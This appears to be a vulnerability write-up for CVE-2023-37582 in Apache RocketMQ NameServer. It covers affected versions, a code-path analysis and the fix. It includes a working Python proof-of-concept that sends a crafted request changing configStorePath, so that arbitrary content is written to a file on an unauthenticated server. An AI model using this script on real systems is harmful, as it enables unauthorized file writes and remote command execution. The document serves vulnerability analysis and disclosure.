Vulnerability Profile
Apache RocketMQ is a distributed message middleware with low latency, high concurrency, high availability and high reliability. In CVE-2023-37582, due to the imperfect repair of CVE-2023-33246, when there is unauthorized access to Apache RocketMQ NameServer, the attacker can construct a malicious request to execute commands as the system user running RocketMQ.
Affected version
Apache RocketMQ <= 5.1.1
Apache RocketMQ <= 4.9.6
Environment build
Refer to Apache RocketMQ Remote Code Execution Vulnerability CVE-2023-33246 Environment Setup
Still for the convenience of debugging, we build RocketMQ related services under linux and use the source code to start
A total of two services need to be running
org.apache.rocketmq.namesrv.NamesrvStartup
org.apache.rocketmq.broker.BrokerStartupFirst start NamesrvStartup, then start BrokerStartup and you need to configure the environment variable ROCKETMQ_HOME
ROCKETMQ_HOME=/home/ubuntu/Desktop/rocketmq-rocketmq-all-5.1.0
Vulnerability recurrence
run python script
import socket
import binascii
client = socket.socket()
# you ip
client.connect(('192.168.222.130',9876))
# data
json = '{"code":318,"flag":0,"language":"JAVA","opaque":266,"serializeTypeCurrentRPC":"JSON","version":433}'.encode('utf-8')
body='configStorePath=/tmp/test.txt\nproductEnvName=123\\ntest'.encode('utf-8')
json_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2) # 一个字节是2个十六进制数
head1 = '00000000'+str(hex(json_lens))[2:] # hex(xxxx) 0x1243434 去掉 0x
all_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)
head2 = '00000000'+str(hex(all_lens))[2:]
data = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')
# send
client.send(bytes.fromhex(data))
data_recv = client.recv(1024)
print(data_recv)
Successfully write the specified string test in the test.txt file under the tmp directory
Vulnerability Analysis
org/apache/rocketmq/remoting/protocol/RequestCode.javacode means to call different functions, at this time, the operation of 318 update configuration is called
src/main/java/org/apache/rocketmq/remoting/protocol/RequestCode.java
According to the corresponding code, the corresponding function will be called for processing
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java
src/main/java/org/apache/rocketmq/namesrv/processor/DefaultRequestProcessor.java#updateConfig
src/main/java/org/apache/rocketmq/remoting/Configuration.java#update
First determine whether it is a controllable attribute
src/main/java/org/apache/rocketmq/remoting/Configuration.java#persist
src/main/java/org/apache/rocketmq/remoting/Configuration.java#getStorePath
Call getStorePathto get the file path, and the value obtained at this time is the value of configStorePath
src/main/java/org/apache/rocketmq/common/MixAll.java#string2File
src/main/java/org/apache/rocketmq/common/MixAll.java#string2FileNotSafe
src/main/java/org/apache/rocketmq/common/utils/IOTinyUtils.java#writeStringToFile
Bug fixes
Modify the parameter that disables modifying the configuration path
Call for original manuscripts
Call for original technical articles, welcome to post
Submission email: [email protected]
Article type: hacker geek technology, information security hotspots, security research and analysis, etc.
If you pass the review and publish it, you can get a remuneration ranging from 200-800 yuan.
For more details, click me to view!
Shooting range practice, click "Read the original text"